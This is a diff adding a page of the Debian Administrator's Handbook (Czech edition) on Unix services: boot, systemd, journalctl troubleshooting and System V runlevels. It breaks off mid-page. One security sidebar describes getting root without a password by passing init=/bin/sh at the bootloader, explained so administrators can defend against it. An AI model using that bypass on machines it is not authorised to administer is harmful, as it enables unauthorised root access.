diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/unix-services.html b/publish/cs-CZ/Debian/9/html/debian-handbook/unix-services.html
new file mode 100644
index 000000000..020a3538a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/unix-services.html
@@ -0,0 +1,668 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 9. Unix Services</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.kernel-installation.html"
+        title="8.11. Installing a Kernel" /><link
+        rel="next"
+        href="sect.remote-login.html"
+        title="9.2. Remote Login" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/unix-services.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-installation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.remote-login.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="unix-services"></a>Kapitola 9. Unix Services</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="unix-services.html#sect.system-boot">9.1. System Boot</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="unix-services.html#sect.systemd">9.1.1. The systemd init system</a></span></dt><dt><span
+                    class="section"><a
+                      href="unix-services.html#sect.sysvinit">9.1.2. The System V init system</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.remote-login.html">9.2. Remote Login</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.remote-login.html#sect.ssh">9.2.1. Secure Remote Login: SSH</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.remote-login.html#sect.remote-desktops">9.2.2. Using Remote Graphical Desktops</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.rights-management.html">9.3. Managing Rights</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.administration-interfaces.html">9.4. Administration Interfaces</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.administration-interfaces.html#sect.webmin">9.4.1. Administrating on a Web Interface: <code
+                        class="command">webmin</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.administration-interfaces.html#sect.debconf">9.4.2. Configuring Packages: <code
+                        class="command">debconf</code></a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.syslog.html">9.5. <code
+                    class="command">syslog</code> System Events</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.syslog.html#sect.syslog-principe">9.5.1. Principle and Mechanism</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.syslog.html#sect.syslog-config">9.5.2. The Configuration File</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.inetd.html">9.6. The <code
+                    class="command">inetd</code> Super-Server</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.task-scheduling-cron-atd.html">9.7. Scheduling Tasks with <code
+                    class="command">cron</code> and <code
+                    class="command">atd</code></a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.task-scheduling-cron-atd.html#sect.format-crontab">9.7.1. Format of a <code
+                        class="filename">crontab</code> File</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.task-scheduling-cron-atd.html#sect.at-command">9.7.2. Using the <code
+                        class="command">at</code> Command</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.asynchronous-task-scheduling-anacron.html">9.8. Scheduling Asynchronous Tasks: <code
+                    class="command">anacron</code></a></span></dt><dt><span
+                class="section"><a
+                  href="sect.quotas.html">9.9. Quotas</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.backup.html">9.10. Backup</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.backup.html#id-1.12.13.11">9.10.1. Backing Up with <code
+                        class="command">rsync</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.backup.html#id-1.12.13.12">9.10.2. Restoring Machines without Backups</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.hotplug.html">9.11. Hot Plugging: <span
+                    class="emphasis"><em>hotplug</em></span></a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html#id-1.12.14.2">9.11.1. Introduction</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html#id-1.12.14.3">9.11.2. The Naming Problem</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html#id-1.12.14.4">9.11.3. How <span
+                        class="emphasis"><em>udev</em></span> Works</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html#id-1.12.14.5">9.11.4. A concrete example</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.power-management.html">9.12. Power Management: Advanced Configuration and Power Interface (ACPI)</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		This chapter covers a number of basic services that are common to many Unix systems. All administrators should be familiar with them.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.system-boot"></a>9.1. System Boot</h2></div></div></div><a
+            id="id-1.12.4.2"
+            class="indexterm"></a><div
+            class="para">
+			When you boot the computer, the many messages scrolling by on the console display many automatic initializations and configurations that are being executed. Sometimes you may wish to slightly alter how this stage works, which means that you need to understand it well. That is the purpose of this section.
+		</div><div
+            class="para">
+			First, the BIOS takes control of the computer, detects the disks, loads the <span
+              class="emphasis"><em>Master Boot Record</em></span>, and executes the bootloader. The bootloader takes over, finds the kernel on the disk, loads and executes it. The kernel is then initialized, and starts to search for and mount the partition containing the root filesystem, and finally executes the first program — <code
+              class="command">init</code>. Frequently, this “root partition” and this <code
+              class="command">init</code> are, in fact, located in a virtual filesystem that only exists in RAM (hence its name, “initramfs”, formerly called “initrd” for “initialization RAM disk”). This filesystem is loaded in memory by the bootloader, often from a file on a hard drive or from the network. It contains the bare minimum required by the kernel to load the “true” root filesystem: this may be driver modules for the hard drive, or other devices without which the system cannot boot, or, more frequently, initialization scripts and modules for assembling RAID arrays, opening encrypted partitions, activating LVM volumes, etc. Once the root partition is mounted, the initramfs hands over control to the real init, and the machine goes back to the standard boot process.
+		</div><div
+            class="figure"><a
+              xmlns=""
+              id="figure.boot-process-systemd"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/startup-systemd.png"
+                  alt="Boot sequence of a computer running Linux with systemd" /></div></div><p
+              class="title"><strong>Obrázek 9.1. Boot sequence of a computer running Linux with systemd</strong></p></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.systemd"></a>9.1.1. The systemd init system</h3></div></div></div><div
+              class="para">
+				The “real init” is currently provided by <span
+                class="pkg pkg">systemd</span> and this section documents this init system.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> Before <code
+                          class="command">systemd</code></strong></p></div></div></div><div
+                class="para">
+				<code
+                  class="command">systemd</code> is a relatively recent “init system”, and although it was already available, to a certain extent, in <span
+                  class="distribution distribution">Wheezy</span>, it has only become the default in Debian <span
+                  class="distribution distribution">Jessie</span>. Previous releases relied, by default, on the “System V init” (in the <span
+                  class="pkg pkg">sysv-rc</span> package), a much more traditional system. We describe the System V init later on.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> Other boot systems</strong></p></div></div></div><div
+                class="para">
+				This book describes the boot system used by default in Debian <span
+                  class="distribution distribution">Jessie</span> (as implemented by the <span
+                  class="pkg pkg">systemd</span> package), as well as the previous default, <span
+                  class="pkg pkg">sysvinit</span>, which is derived and inherited from <span
+                  class="emphasis"><em>System V</em></span> Unix systems; there are others.
+			</div><div
+                class="para">
+				<span
+                  class="pkg pkg">file-rc</span> is a boot system with a very simple process. It keeps the principle of runlevels, but replaces the directories and symbolic links with a configuration file, which indicates to <code
+                  class="command">init</code> the processes that must be started and their launch order.
+			</div><div
+                class="para">
+				The <code
+                  class="command">upstart</code> system is still not perfectly tested on Debian. It is event based: init scripts are no longer executed in a sequential order but in response to events such as the completion of another script upon which they are dependent. This system, started by Ubuntu, is present in Debian <span
+                  class="distribution distribution">Jessie</span>, but is not the default; it comes, in fact, as a replacement for <span
+                  class="pkg pkg">sysvinit</span>, and one of the tasks launched by <code
+                  class="command">upstart</code> is to launch the scripts written for traditional systems, especially those from the <span
+                  class="pkg pkg">sysv-rc</span> package.
+			</div><div
+                class="para">
+				There are also other systems and other operating modes, such as <code
+                  class="command">runit</code> or <code
+                  class="command">minit</code>, but they are relatively specialized and not widespread.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SPECIFIC CASE</em></span> Booting from the network</strong></p></div></div></div><div
+                class="para">
+				In some configurations, the BIOS may be configured not to execute the MBR, but to seek its equivalent on the network, making it possible to build computers without a hard drive, or which are completely reinstalled on each boot. This option is not available on all hardware and it generally requires an appropriate combination of BIOS and network card.
+			</div><div
+                class="para">
+				Booting from the network can be used to launch the <code
+                  class="command">debian-installer</code> or FAI (see <a
+                  class="xref"
+                  href="installation.html#sect.installation-methods">4.1 – „Installation Methods“</a>).
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> The process, a program instance</strong></p></div></div></div><a
+                id="id-1.12.4.6.6.2"
+                class="indexterm"></a><div
+                class="para">
+				A process is the representation in memory of a running program. It includes all of the information necessary for the proper execution of the software (the code itself, but also the data that it has in memory, the list of files that it has opened, the network connections it has established, etc.). A single program may be instantiated into several processes, not necessarily running under different user IDs.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> Using a shell as <code
+                          class="command">init</code> to gain root rights</strong></p></div></div></div><div
+                class="para">
+				By convention, the first process that is booted is the <code
+                  class="command">init</code> program (which is a symbolic link to <code
+                  class="filename">/lib/systemd/systemd</code> by default). However, it is possible to pass an <code
+                  class="literal">init</code> option to the kernel indicating a different program.
+			</div><a
+                id="id-1.12.4.6.7.3"
+                class="indexterm"></a><div
+                class="para">
+				Any person who is able to access the computer can press the <span
+                  class="keycap"><strong>Reset</strong></span> button, and thus reboot it. Then, at the bootloader's prompt, it is possible to pass the <code
+                  class="literal">init=/bin/sh</code> option to the kernel to gain root access without knowing the administrator's password.
+			</div><div
+                class="para">
+				To prevent this, you can protect the bootloader itself with a password. You might also think about protecting access to the BIOS (a password protection mechanism is almost always available), without which a malicious intruder could still boot the machine on a removable media containing its own Linux system, which they could then use to access data on the computer's hard drives.
+			</div><div
+                class="para">
+				Finally, be aware that most BIOS have a generic password available. Initially intended for troubleshooting for those who have forgotten their password, these passwords are now public and available on the Internet (see for yourself by searching for “generic BIOS passwords” in a search engine). All of these protections will thus impede unauthorized access to the machine without being able to completely prevent it. There is no reliable way to protect a computer if the attacker can physically access it; they could dismount the hard drives to connect them to a computer under their own control anyway, or even steal the entire machine, or erase the BIOS memory to reset the password…
+			</div></div><div
+              class="para">
+				Systemd executes several processes, in charge of setting up the system: keyboard, drivers, filesystems, network, services. It does this while keeping a global view of the system as a whole, and the requirements of the components. Each component is described by a “unit file” (sometimes more); the general syntax is derived from the widely-used “*.ini files“ syntax, with <code
+                class="literal"><em
+                  class="replaceable">key</em> = <em
+                  class="replaceable">value</em></code> pairs grouped between <code
+                class="literal">[<em
+                  class="replaceable">section</em>]</code> headers. Unit files are stored under <code
+                class="filename">/lib/systemd/system/</code> and <code
+                class="filename">/etc/systemd/system/</code>; they come in several flavours, but we will focus on “services” and “targets” here.
+			</div><div
+              class="para">
+				A systemd “service file” describes a process managed by systemd. It contains roughly the same information as old-style init-scripts, but expressed in a declaratory (and much more concise) way. Systemd handles the bulk of the repetitive tasks (starting and stopping the process, checking its status, logging, dropping privileges, and so on), and the service file only needs to fill in the specifics of the process. For instance, here is the service file for SSH:
+			</div><pre
+              class="programlisting">[Unit]
+Description=OpenBSD Secure Shell server
+After=network.target auditd.service
+ConditionPathExists=!/etc/ssh/sshd_not_to_be_run
+
+[Service]
+EnvironmentFile=-/etc/default/ssh
+ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
+ExecReload=/bin/kill -HUP $MAINPID
+KillMode=process
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+Alias=sshd.service
+</pre><div
+              class="para">
+				As you can see, there is very little code in there, only declarations. Systemd takes care of displaying progress reports, keeping track of the processes, and even restarting them when needed.
+			</div><div
+              class="para">
+				A systemd “target file” describes a state of the system, where a set of services are known to be operational. It can be thought of as an equivalent of the old-style runlevel. One of the targets is <code
+                class="literal">local-fs.target</code>; when it is reached, the rest of the system can assume that all local filesystems are mounted and accessible. Other targets include <code
+                class="literal">network-online.target</code> and <code
+                class="literal">sound.target</code>. The dependencies of a target can be listed either within the target file (in the <code
+                class="literal">Requires=</code> line), or using a symbolic link to a service file in the <code
+                class="literal">/lib/systemd/system/<em
+                  class="replaceable">targetname</em>.target.wants/</code> directory. For instance, <code
+                class="filename">/etc/systemd/system/printer.target.wants/</code> contains a link to <code
+                class="filename">/lib/systemd/system/cups.service</code>; systemd will therefore ensure CUPS is running in order to reach <code
+                class="literal">printer.target</code>.
+			</div><div
+              class="para">
+				Since unit files are declarative rather than scripts or programs, they cannot be run directly, and they are only interpreted by systemd; several utilities therefore allow the administrator to interact with systemd and control the state of the system and of each component.
+			</div><div
+              class="para">
+				The first such utility is <code
+                class="command">systemctl</code>. When run without any arguments, it lists all the unit files known to systemd (except those that have been disabled), as well as their status. <code
+                class="command">systemctl status</code> gives a better view of the services, as well as the related processes. If given the name of a service (as in <code
+                class="command">systemctl status ntp.service</code>), it returns even more details, as well as the last few log lines related to the service (more on that later).
+			</div><div
+              class="para">
+				Starting a service by hand is a simple matter of running <code
+                class="command">systemctl start <em
+                  class="replaceable">servicename</em>.service</code>. As one can guess, stopping the service is done with <code
+                class="command">systemctl stop <em
+                  class="replaceable">servicename</em>.service</code>; other subcommands include <code
+                class="command">reload</code> and <code
+                class="command">restart</code>.
+			</div><div
+              class="para">
+				To control whether a service is active (i.e. whether it will get started automatically on boot), use <code
+                class="command">systemctl enable <em
+                  class="replaceable">servicename</em>.service</code> (or <code
+                class="command">disable</code>). <code
+                class="command">is-enabled</code> allows checking the status of the service.
+			</div><div
+              class="para">
+				An interesting feature of systemd is that it includes a logging component named <code
+                class="command">journald</code>. It comes as a complement to more traditional logging systems such as <code
+                class="command">syslogd</code>, but it adds interesting features such as a formal link between a service and the messages it generates, and the ability to capture error messages generated by its initialisation sequence. The messages can be displayed later on, with a little help from the <code
+                class="command">journalctl</code> command. Without any arguments, it simply spews all log messages that occurred since system boot; it will rarely be used in such a manner. Most of the time, it will be used with a service identifier:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>journalctl -u ssh.service
+</code></strong><code
+                class="computeroutput">-- Logs begin at Tue 2015-03-31 10:08:49 CEST, end at Tue 2015-03-31 17:06:02 CEST. --
+Mar 31 10:08:55 mirtuel sshd[430]: Server listening on 0.0.0.0 port 22.
+Mar 31 10:08:55 mirtuel sshd[430]: Server listening on :: port 22.
+Mar 31 10:09:00 mirtuel sshd[430]: Received SIGHUP; restarting.
+Mar 31 10:09:00 mirtuel sshd[430]: Server listening on 0.0.0.0 port 22.
+Mar 31 10:09:00 mirtuel sshd[430]: Server listening on :: port 22.
+Mar 31 10:09:32 mirtuel sshd[1151]: Accepted password for roland from 192.168.1.129 port 53394 ssh2
+Mar 31 10:09:32 mirtuel sshd[1151]: pam_unix(sshd:session): session opened for user roland by (uid=0)
+</code></pre><div
+              class="para">
+				Another useful command-line flag is <code
+                class="command">-f</code>, which instructs <code
+                class="command">journalctl</code> to keep displaying new messages as they are emitted (much in the manner of <code
+                class="command">tail -f <em
+                  class="replaceable">file</em></code>).
+			</div><div
+              class="para">
+				If a service doesn't seem to be working as expected, the first step to solve the problem is to check that the service is actually running with <code
+                class="command">systemctl status</code>; if it is not, and the messages given by the first command are not enough to diagnose the problem, check the logs gathered by journald about that service. For instance, assume the SSH server doesn't work:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>systemctl status ssh.service
+</code></strong><code
+                class="computeroutput">● ssh.service - OpenBSD Secure Shell server
+   Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
+   Active: failed (Result: start-limit) since Tue 2015-03-31 17:30:36 CEST; 1s ago
+  Process: 1023 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
+  Process: 1188 ExecStart=/usr/sbin/sshd -D $SSHD_OPTS (code=exited, status=255)
+ Main PID: 1188 (code=exited, status=255)
+
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service start request repeated too quickly, refusing to start.
+Mar 31 17:30:36 mirtuel systemd[1]: Failed to start OpenBSD Secure Shell server.
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+# </code><strong
+                class="userinput"><code>journalctl -u ssh.service
+</code></strong><code
+                class="computeroutput">-- Logs begin at Tue 2015-03-31 17:29:27 CEST, end at Tue 2015-03-31 17:30:36 CEST. --
+Mar 31 17:29:27 mirtuel sshd[424]: Server listening on 0.0.0.0 port 22.
+Mar 31 17:29:27 mirtuel sshd[424]: Server listening on :: port 22.
+Mar 31 17:29:29 mirtuel sshd[424]: Received SIGHUP; restarting.
+Mar 31 17:29:29 mirtuel sshd[424]: Server listening on 0.0.0.0 port 22.
+Mar 31 17:29:29 mirtuel sshd[424]: Server listening on :: port 22.
+Mar 31 17:30:10 mirtuel sshd[1147]: Accepted password for roland from 192.168.1.129 port 38742 ssh2
+Mar 31 17:30:10 mirtuel sshd[1147]: pam_unix(sshd:session): session opened for user roland by (uid=0)
+Mar 31 17:30:35 mirtuel sshd[1180]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:35 mirtuel sshd[1182]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:35 mirtuel sshd[1184]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel sshd[1186]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel sshd[1188]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service start request repeated too quickly, refusing to start.
+Mar 31 17:30:36 mirtuel systemd[1]: Failed to start OpenBSD Secure Shell server.
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+# </code><strong
+                class="userinput"><code>vi /etc/ssh/sshd_config
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>systemctl start ssh.service
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>systemctl status ssh.service
+</code></strong><code
+                class="computeroutput">● ssh.service - OpenBSD Secure Shell server
+   Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
+   Active: active (running) since Tue 2015-03-31 17:31:09 CEST; 2s ago
+  Process: 1023 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
+ Main PID: 1222 (sshd)
+   CGroup: /system.slice/ssh.service
+           └─1222 /usr/sbin/sshd -D
+# </code></pre><div
+              class="para">
+				After checking the status of the service (failed), we went on to check the logs; they indicate an error in the configuration file. After editing the configuration file and fixing the error, we restart the service, then verify that it is indeed running.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Other types of unit files</strong></p></div></div></div><div
+                class="para">
+				We have only described the most basic of systemd's capabilities in this section. It offers many other interesting features; we will only list a few here:
+			</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+						socket activation: a “socket” unit file can be used to describe a network or Unix socket managed by systemd; this means that the socket will be created by systemd, and the actual service may be started on demand when an actual connection attempt comes. This roughly replicates the feature set of <code
+                        class="command">inetd</code>. See <span
+                        class="citerefentry"><span
+                          class="refentrytitle">systemd.socket</span>(5)</span>.
+					</div></li><li
+                    class="listitem"><div
+                      class="para">
+						timers: a “timer” unit file describes events that occur with a fixed frequency or on specific times; when a service is linked to such a timer, the corresponding task will be executed whenever the timer fires. This allows replicating part of the <code
+                        class="command">cron</code> features. See <span
+                        class="citerefentry"><span
+                          class="refentrytitle">systemd.timer</span>(5)</span>.
+					</div></li><li
+                    class="listitem"><div
+                      class="para">
+						network: a “network“ unit file describes a network interface, which allows configuring such interfaces as well as expressing that a service depends on one particular interface being up.
+					</div></li></ul></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.sysvinit"></a>9.1.2. The System V init system</h3></div></div></div><div
+              class="para">
+				The System V init system (which we'll call init for brevity) executes several processes, following instructions from the <code
+                class="filename">/etc/inittab</code> file. The first program that is executed (which corresponds to the <span
+                class="emphasis"><em>sysinit</em></span> step) is <code
+                class="command">/etc/init.d/rcS</code>, a script that executes all of the programs in the <code
+                class="filename">/etc/rcS.d/</code> directory. <a
+                id="id-1.12.4.7.2.5"
+                class="indexterm"></a> <a
+                id="id-1.12.4.7.2.6"
+                class="indexterm"></a> <a
+                id="id-1.12.4.7.2.7"
+                class="indexterm"></a> <a
+                id="id-1.12.4.7.2.8"
+                class="indexterm"></a>
+			</div><div
+              class="para">
+				Among these, you will find successively programs in charge of:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						configuring the console's keyboard;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						loading drivers: most of the kernel modules are loaded by the kernel itself as the hardware is detected; extra drivers are then loaded automatically when the corresponding modules are listed in <code
+                      class="filename">/etc/modules</code>;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						checking the integrity of filesystems;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						mounting local partitions;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						configuring the network;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						mounting network filesystems (NFS).
+					</div></li></ul></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Kernel modules and options</strong></p></div></div></div><a
+                id="id-1.12.4.7.5.2"
+                class="indexterm"></a><div
+                class="para">
+				Kernel modules also have options that can be configured by putting some files in <code
+                  class="filename">/etc/modprobe.d/</code>. These options are defined with directives like this: <code
+                  class="literal">options <em
+                    class="replaceable">module-name</em> <em
+                    class="replaceable">option-name</em>=<em
+                    class="replaceable">option-value</em></code>. Several options can be specified with a single directive if necessary.
+			</div><div
+                class="para">
+				These configuration files are intended for <code
+                  class="command">modprobe</code> — the program that loads a kernel module with its dependencies (modules can indeed call other modules). This program is provided by the <span
+                  class="pkg pkg">kmod</span> package.
+			</div><a
+                id="id-1.12.4.7.5.5"
+                class="indexterm"></a><a
+                id="id-1.12.4.7.5.6"
+                class="indexterm"></a></div><div
+              class="para">
+				After this stage, <code
+                class="command">init</code> takes over and starts the programs enabled in the default runlevel (which is usually runlevel 2). It executes <code
+                class="command">/etc/init.d/rc 2</code>, a script that starts all services which are listed in <code
+                class="filename">/etc/rc2.d/</code> and whose names start with the “S” letter. The two-figures number that follows had historically been used to define the order in which services had to be started, but nowadays the default boot system uses <code
+                class="command">insserv</code>, which schedules everything automatically based on the scripts' dependencies. Each boot script thus declares the conditions that must be met to start or stop the service (for example, if it must start before or after another service); <code
+                class="command">init</code> then launches them in the order that meets these conditions. The static numbering of scripts is therefore no longer taken into consideration (but they must always have a name beginning with “S” followed by two digits and the actual name of the script used for the dependencies). Generally, base services (such as logging with <code
+                class="command">rsyslog</code>, or port assignment with <code
+                class="command">portmap</code>) are started first, followed by standard services and the graphical interface (<code
+                class="command">gdm3</code>).
+			</div><div
+              class="para">
+				This dependency-based boot system makes it possible to automate re-numbering, which could be rather tedious if it had to be done manually, and it limits the risks of human error, since scheduling is conducted according to the parameters that are indicated. Another benefit is that services can be started in parallel when they are independent from one another, which can accelerate the boot process.
+			</div><a
+              id="id-1.12.4.7.8"
+              class="indexterm"></a><a
+              id="id-1.12.4.7.9"
+              class="indexterm"></a><div
+              class="para">
+				<code
+                class="command">init</code> distinguishes several runlevels, so it can switch from one to another with the <code
+                class="command">telinit <em
+                  class="replaceable">new-level</em></code> command. Immediately, <code
+                class="command">init</code> executes <code
+                class="command">/etc/init.d/rc</code> again with the new runlevel. This script will then start the missing services and stop those that are no longer desired. To do this, it refers to the content of the <code
+                class="filename">/etc/rc<em
+                  class="replaceable">X</em>.d</code> (where <em
+                class="replaceable">X</em> represents the new runlevel). Scripts starting with “S” (as in “Start”) are services to be started; those starting with “K” (as in “Kill”) are the services to be stopped. The script does not start any service that was already active in the previous runlevel.
+			</div><div
+              class="para">
+				By default, System V init in Debian uses four different runlevels:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						Level 0 is only used temporarily, while the computer is powering down. As such, it only contains many “K” scripts.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						Level 1, also known as single-user mode, corresponds to the system in degraded mode; it includes only basic services, and is intended for maintenance operations where interactions with ordinary users are not desired.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						Level 2 is the level for normal operation, which includes networking services, a graphical interface, user logins, etc.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						Level 6 is similar to level 0, except that it is used during the shutdown phase that precedes a reboot.
+					</div></li></ul></div><div
+              class="para">
+				Other levels exist, especially 3 to 5. By default they are configured to operate the same way as level 2, but the administrator can modify them (by adding or deleting scripts in the corresponding <code
+                class="filename">/etc/rc<em
+                  class="replaceable">X</em>.d</code> directories) to adapt them to particular needs.
+			</div><div
+              class="figure"><a
+                xmlns=""
+                id="figure.boot-process-sysvinit"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/startup-sysvinit.png"
+                    alt="Boot sequence of a computer running Linux with System V init" /></div></div><p
+                class="title"><strong>Obrázek 9.2. Boot sequence of a computer running Linux with System V init</strong></p></div><a
+              id="id-1.12.4.7.15"
+              class="indexterm"></a><div
+              class="para">
+				All the scripts contained in the various <code
+                class="filename">/etc/rc<em
+                  class="replaceable">X</em>.d</code> directories are really only symbolic links — created upon package installation by the <code
+                class="command">update-rc.d</code> program — pointing to the actual scripts which are stored in <code
+                class="filename">/etc/init.d/</code>. The administrator can fine tune the services available in each runlevel by re-running <code
+                class="command">update-rc.d</code> with adjusted parameters. The <span
+                class="citerefentry"><span
